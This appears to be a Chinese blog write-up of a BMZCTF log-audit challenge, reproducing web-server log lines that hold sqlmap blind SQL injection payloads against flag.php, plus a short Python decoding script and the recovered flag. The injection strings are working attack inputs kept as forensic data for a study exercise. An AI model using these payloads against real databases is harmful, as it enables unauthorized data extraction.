首页 > 编程札记 > 编程

BMZCTF:日志审计

阅读: 评论:0

BMZCTF:日志审计

BMZCTF:日志审计


logcheck.log

盲注的日志,将flag.php这块的内容提取出来

192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C1%2C1%29%29%3D102--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C2%2C1%29%29%3D108--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C3%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C4%2C1%29%29%3D103--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C5%2C1%29%29%3D123--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C6%2C1%29%29%3D109--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C7%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C8%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C9%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C10%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C11%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C12%2C1%29%29%3D104--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C13%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C14%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C15%2C1%29%29%3D49--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C16%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C17%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C18%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C19%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C20%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C21%2C1%29%29%3D55--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C22%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C23%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C24%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C38%2C1%29%29%3D125--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"

Python处理提取出flag

from urllib.parse import unquotewith open('./') as f:lines = f.readlines()for line in lines:line = unquote(line)line = line[line.find('))=')+3:line.find('--')]print(chr(int(line)),end="")


flag{mayiyahei1965ae7569}

本文发布于:2024-01-31 15:39:27,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170668676529585.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

上一篇:eclipse查看方法说明时出现This element neither has attached source nor attached Javadoc and hence no Javadoc
下一篇:[pwnthebox] misc 日志分析
标签:日志   BMZCTF
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
热门标签

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23